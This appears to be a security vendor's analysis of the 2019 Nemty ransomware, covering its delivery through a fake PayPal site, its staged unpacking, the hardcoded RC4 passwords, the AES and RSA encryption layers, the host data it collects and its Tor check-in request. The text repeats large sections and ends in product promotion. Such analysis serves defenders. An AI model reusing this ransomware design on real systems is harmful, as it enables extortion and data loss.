A new ransomware called Nemty has appeared on the network, which is supposedly the successor to GrandCrab or Buran. The malware is mainly distributed from the fake PayPal website and has a number of interesting features. Details about how this ransomware works are under the cut.
The new Nemty ransomware was discovered by user nao_sec on September 7, 2019. The malware was distributed through a site disguised as PayPal, and it is also possible for ransomware to penetrate the computer through the RIG exploit kit. The attackers used social engineering methods to force the user to run the cashback.exe file, which he allegedly received from the PayPal website. It is also curious that Nemty specified the wrong port for the local proxy service Tor, which prevents the malware from sending data to the server. Therefore, the user will have to upload encrypted files to the Tor network himself if he intends to pay the ransom and wait for decryption from the attackers.
Several interesting facts about Nemty suggest that it was developed by the same people or by cybercriminals associated with Buran and GrandCrab.
SHA-256: A127323192ABED93AED53648D03CA84DE3B5B006B641033EB46A520B7A3C16FC
After unpacking the archive, three files will appear.
Next, temp.exe is launched, a PE32 executable file under MS Windows with a size of 307200 bytes. The code is written in Visual C++ and packaged with MPRESS packer, a packer similar to UPX.
SHA-256: EBDBA4B1D1DE65A1C6B14012B674E7FA7F8C5F5A8A5A2A9C3C338F02DD726AAD
The next step is ironman.exe. Once launched, temp.exe decrypts the embedded data in temp and renames it to ironman.exe, a 544768 byte PE32 executable file. The code is compiled in Borland Delphi.
SHA-256: 2C41B93ADD9AC5080A12BF93966470F8AB3BDE003001492A10F63758867F2A88
The last step is to restart the ironman.exe file. At runtime, it transforms its code and runs itself from memory. This version of ironman.exe is malicious and is responsible for encryption.
The complete infection chain can be viewed at app.any.run sandbox.
Next, the registry key is installed, which looks like this:
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0]
“rundll32.exe” “C:\Windows\system32\advpack.dll,DelNodeRunDLL32 “C:\Users \MALWAR~1\AppData\Local\Temp\IXPxxx.TMP\""
It is used to delete unpacked files. Finally, cashback.exe starts the temp.exe process.
Temp.exe is the second step in the infection chain.
This is the process launched by the cashback.exe file, the second step in the execution of the virus. It tries to download AutoHotKey, a tool for running scripts on Windows, and run the WindowSpy.ahk script located in the resources section of the PE file.
The WindowSpy.ahk script decrypts the temp file in ironman.exe using the RC4 algorithm and the password IwantAcake. The key from the password is obtained using the MD5 hashing algorithm.
temp.exe then calls the ironman.exe process.
Ironman.exe - third step
Ironman.exe reads the contents of the iron.bmp file and creates an iron.txt file with a cryptolocker that will be launched next.
After this, the virus loads iron.txt into memory and restarts it as ironman.exe. After this, iron.txt is deleted.
ironman.exe is the main part of the NEMTY ransomware, which encrypts files on the affected computer. Malware creates a mutex called hate.
The first thing it does is determine the geographic location of the computer. Nemty opens a browser and finds out the IP at http://api.ipify.org . On the website api.db-ip.com/v2/free [IP]/countryName, the country is determined by the received IP, and if the computer is located in one of the regions listed below, the execution of the malware code stops:
Most likely, developers do not want to attract the attention of law enforcement agencies in their countries of residence, and therefore do not encrypt files in their “home” jurisdictions.
If the victim's IP address does not belong to the list above, then the virus encrypts the user's information.
To prevent file recovery, their shadow copies are deleted:
It then creates a list of files and folders that will not be encrypted, as well as a list of file extensions.
log LOG CAB cab CMD cmd COM com cpl
CPL exe EXE ini INI dll DDL lnk LNK url
URL ttf TTF DECRYPT.txt NEMTY
The decryption process using CryptStringToBinary is as follows
The second encryption algorithm is RSA-2048. The key pair is generated by the CryptGenKey() function and imported by the CryptImportKey() function.
Once the key pair for the session is generated, the public key is imported into the MS Cryptographic Service Provider.
An example of a generated public key for a session:
Next, the private key is imported into the CSP.
An example of a generated private key for a session:
And last comes RSA-8192. The main public key is stored in encrypted form (Base64 + RC4) in the .data section of the PE file.
The RSA-8192 key after base64 decoding and RC4 decryption with the fuckav password looks like this.
As a result, the entire encryption process looks like this:
Example of encrypted files:
It calls the GetLogicalDrives(), GetFreeSpace(), GetDriveType() functions to collect information about the drives of the infected computer.
The collected information is stored in a configuration file. Having decoded the string, we get a list of parameters in the configuration file:
Example configuration of an infected computer:
The configuration template can be represented as follows:
{"General": {"IP":"[IP]", "Country":"[Country]", "ComputerName":"[ComputerName]", "Username":"[Username ]", "OS":"[OS]", "isRU":false, "version":"1.4", "CompID":"{[CompID]}", "FileID":"_NEMTY_[FileID]_" ,“UserID”:”[UserID]”, “key”:”[key]”, “pr_key”:”[pr_key]
Nemty stores the collected data in JSON format in the file %USER%/_NEMTY_.nemty. FileID is 7 characters long randomly generated. For example: _NEMTY_tgdLYrd_.nemty. FileID is also added to the end of the encrypted file.
At the end of the file there is encrypted information about the infected computer.
Nemty then tries to send configuration data to 127.0.0.1:9050, where it expects to find a working Tor browser proxy. However, by default the Tor proxy listens on port 9150, and port 9050 is used by the Tor daemon on Linux or Expert Bundle on Windows. Thus, no data is sent to the attacker's server. Instead, the user can download the configuration file manually by visiting the Tor decryption service via the link provided in the ransom message.
Connecting to Tor proxy:
HTTP GET creates a request to 127.0.0.1:9050/public/gate?data=
Here you can see the open TCP ports that are used by the TORlocal proxy:
Nemty decryption service on the Tor network:
You can upload an encrypted photo (jpg, png, bmp) to test the decryption service.
After this, the attacker asks to pay a ransom. In case of non-payment the price is doubled.
However, Acronis Backup and Acronis True Image solutions prevent Nemty ransomware from reaching users' PCs and data, and providers can protect their customers using Acronis Backup Cloud . Complete Cyber Protection provides not only backup, but also protection using Acronis Active Protection , a special technology based on artificial intelligence and behavioral heuristics that allows you to neutralize even as yet unknown malware.
The new Nemty ransomware was discovered by user nao_sec on September 7, 2019. The malware was distributed through a site disguised as PayPal, and it is also possible for ransomware to penetrate the computer through the RIG exploit kit. The attackers used social engineering methods to force the user to run the cashback.exe file, which he allegedly received from the PayPal website. It is also curious that Nemty specified the wrong port for the local proxy service Tor, which prevents the malware from sending data to the server. Therefore, the user will have to upload encrypted files to the Tor network himself if he intends to pay the ransom and wait for decryption from the attackers.
Several interesting facts about Nemty suggest that it was developed by the same people or by cybercriminals associated with Buran and GrandCrab.
- Like GandCrab, Nemty has an Easter egg - a link to a photo of Russian President Vladimir Putin with an obscene joke. The legacy GandCrab ransomware had an image with the same text.
- The language artifacts of both programs point to the same Russian-speaking authors.
- This is the first ransomware to use an 8092-bit RSA key. Although there is no point in this: a 1024-bit key is quite enough to protect against hacking.
- Like Buran, the ransomware is written in Object Pascal and compiled in Borland Delphi.
Static analysis
Execution of malicious code occurs in four stages. The first step is to run cashback.exe, a PE32 executable file under MS Windows with a size of 1198936 bytes. Its code was written in Visual C++ and compiled on October 14, 2013. It contains an archive that is automatically unpacked when you run cashback.exe. The software uses the Cabinet.dll library and its functions FDICreate(), FDIDestroy() and others to obtain files from the .cab archive.
SHA-256: A127323192ABED93AED53648D03CA84DE3B5B006B641033EB46A520B7A3C16FC
After unpacking the archive, three files will appear.
Next, temp.exe is launched, a PE32 executable file under MS Windows with a size of 307200 bytes. The code is written in Visual C++ and packaged with MPRESS packer, a packer similar to UPX.
SHA-256: EBDBA4B1D1DE65A1C6B14012B674E7FA7F8C5F5A8A5A2A9C3C338F02DD726AAD
The next step is ironman.exe. Once launched, temp.exe decrypts the embedded data in temp and renames it to ironman.exe, a 544768 byte PE32 executable file. The code is compiled in Borland Delphi.
SHA-256: 2C41B93ADD9AC5080A12BF93966470F8AB3BDE003001492A10F63758867F2A88
The last step is to restart the ironman.exe file. At runtime, it transforms its code and runs itself from memory. This version of ironman.exe is malicious and is responsible for encryption.
Attack vector
Currently, the Nemty ransomware is distributed through the website pp-back.info.
The complete infection chain can be viewed at app.any.run sandbox.
Installation
Cashback.exe - the beginning of the attack. As already mentioned, cashback.exe unpacks the .cab file it contains. It then creates a folder TMP4351$.TMP of the form %TEMP%\IXxxx.TMP, where xxx is a number from 001 to 999.
Next, the registry key is installed, which looks like this:
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0]
“rundll32.exe” “C:\Windows\system32\advpack.dll,DelNodeRunDLL32 “C:\Users \MALWAR~1\AppData\Local\Temp\IXPxxx.TMP\""
It is used to delete unpacked files. Finally, cashback.exe starts the temp.exe process.
Temp.exe is the second step in the infection chain.
This is the process launched by the cashback.exe file, the second step in the execution of the virus. It tries to download AutoHotKey, a tool for running scripts on Windows, and run the WindowSpy.ahk script located in the resources section of the PE file.
The WindowSpy.ahk script decrypts the temp file in ironman.exe using the RC4 algorithm and the password IwantAcake. The key from the password is obtained using the MD5 hashing algorithm.
temp.exe then calls the ironman.exe process.
Ironman.exe - third step
Ironman.exe reads the contents of the iron.bmp file and creates an iron.txt file with a cryptolocker that will be launched next.
After this, the virus loads iron.txt into memory and restarts it as ironman.exe. After this, iron.txt is deleted.
ironman.exe is the main part of the NEMTY ransomware, which encrypts files on the affected computer. Malware creates a mutex called hate.
The first thing it does is determine the geographic location of the computer. Nemty opens a browser and finds out the IP at http://api.ipify.org . On the website api.db-ip.com/v2/free [IP]/countryName, the country is determined by the received IP, and if the computer is located in one of the regions listed below, the execution of the malware code stops:
- Russia
- Belarus
- Ukraine
- Kazakhstan
- Tajikistan
Most likely, developers do not want to attract the attention of law enforcement agencies in their countries of residence, and therefore do not encrypt files in their “home” jurisdictions.
If the victim's IP address does not belong to the list above, then the virus encrypts the user's information.
To prevent file recovery, their shadow copies are deleted:
It then creates a list of files and folders that will not be encrypted, as well as a list of file extensions.
- windows
- $RECYCLE.BIN
- rsa
- NTDETECT.COM
- ntldr
- MSDOS.SYS
- IO.SYS
- boot.ini AUTOEXEC.BAT ntuser.dat
- desktop.ini
- CONFIG.SYS
- BOOTSECT.BAK
- bootmgr
- programdata
- appdata
- osoft
- Common Files
log LOG CAB cab CMD cmd COM com cpl
CPL exe EXE ini INI dll DDL lnk LNK url
URL ttf TTF DECRYPT.txt NEMTY
Obfuscation
To hide URLs and embedded configuration data, Nemty uses a base64 and RC4 encoding algorithm with the fuckav keyword.
The decryption process using CryptStringToBinary is as follows
Encryption
Nemty uses three-layer encryption:- AES-128-CBC for files. The 128-bit AES key is randomly generated and is used the same for all files. It is stored in a configuration file on the user's computer. The IV is randomly generated for each file and stored in an encrypted file.
- RSA-2048 for file encryption IV. A key pair for the session is generated. The private key for the session is stored in a configuration file on the user's computer.
- RSA-8192. The master public key is built into the program and is used to encrypt the configuration file, which stores the AES key and secret key for the RSA-2048 session.
- Nemty first generates 32 bytes of random data. The first 16 bytes are used as the AES-128-CBC key.
The second encryption algorithm is RSA-2048. The key pair is generated by the CryptGenKey() function and imported by the CryptImportKey() function.
Once the key pair for the session is generated, the public key is imported into the MS Cryptographic Service Provider.
An example of a generated public key for a session:
Next, the private key is imported into the CSP.
An example of a generated private key for a session:
And last comes RSA-8192. The main public key is stored in encrypted form (Base64 + RC4) in the .data section of the PE file.
The RSA-8192 key after base64 decoding and RC4 decryption with the fuckav password looks like this.
As a result, the entire encryption process looks like this:
- Generate a 128-bit AES key that will be used to encrypt all files.
- Create an IV for each file.
- Creating a key pair for an RSA-2048 session.
- Decryption of an existing RSA-8192 key using base64 and RC4.
- Encrypt file contents using the AES-128-CBC algorithm from the first step.
- IV encryption using RSA-2048 public key and base64 encoding.
- Adding an encrypted IV to the end of each encrypted file.
- Adding an AES key and RSA-2048 session private key to the config.
- The configuration data described in the section Collecting information about the infected computer is encrypted using the RSA-8192 master public key.
- The encrypted file looks like this:
Example of encrypted files:
Collecting information about the infected computer
The ransomware collects keys to decrypt infected files, so the attacker can actually create a decryptor. In addition, Nemty collects user data such as username, computer name, hardware profile.
It calls the GetLogicalDrives(), GetFreeSpace(), GetDriveType() functions to collect information about the drives of the infected computer.
The collected information is stored in a configuration file. Having decoded the string, we get a list of parameters in the configuration file:
Example configuration of an infected computer:
The configuration template can be represented as follows:
{"General": {"IP":"[IP]", "Country":"[Country]", "ComputerName":"[ComputerName]", "Username":"[Username ]", "OS":"[OS]", "isRU":false, "version":"1.4", "CompID":"{[CompID]}", "FileID":"_NEMTY_[FileID]_" ,“UserID”:”[UserID]”, “key”:”[key]”, “pr_key”:”[pr_key]
Nemty stores the collected data in JSON format in the file %USER%/_NEMTY_.nemty. FileID is 7 characters long randomly generated. For example: _NEMTY_tgdLYrd_.nemty. FileID is also added to the end of the encrypted file.
Ransom message
After encrypting the files, the file _NEMTY_[FileID]-DECRYPT.txt appears on the desktop with the following content:
At the end of the file there is encrypted information about the infected computer.
Network communication
The ironman.exe process downloads the Tor browser distribution from https://dist.torproject.org/torbrowser/8.5.4/tor-win32-0.4.0.5.zip and tries to install it.Nemty then tries to send configuration data to 127.0.0.1:9050, where it expects to find a working Tor browser proxy. However, by default the Tor proxy listens on port 9150, and port 9050 is used by the Tor daemon on Linux or Expert Bundle on Windows. Thus, no data is sent to the attacker's server. Instead, the user can download the configuration file manually by visiting the Tor decryption service via the link provided in the ransom message.
Connecting to Tor proxy:
HTTP GET creates a request to 127.0.0.1:9050/public/gate?data=
Here you can see the open TCP ports that are used by the TORlocal proxy:
Nemty decryption service on the Tor network:
You can upload an encrypted photo (jpg, png, bmp) to test the decryption service.
After this, the attacker asks to pay a ransom. In case of non-payment the price is doubled.
Conclusion
At the moment, it is not possible to decrypt files encrypted by Nemty without paying a ransom. This version of ransomware has common features with the Buran ransomware and the outdated GandCrab: compilation in Borland Delphi and images with the same text. In addition, this is the first encryptor that uses an 8092-bit RSA key, which, again, does not make any sense, since a 1024-bit key is sufficient for protection. Finally, and interestingly, it tries to use the wrong port for the local Tor proxy service.However, Acronis Backup and Acronis True Image solutions prevent Nemty ransomware from reaching users' PCs and data, and providers can protect their customers using Acronis Backup Cloud . Complete Cyber Protection provides not only backup, but also protection using Acronis Active Protection , a special technology based on artificial intelligence and behavioral heuristics that allows you to neutralize even as yet unknown malware.
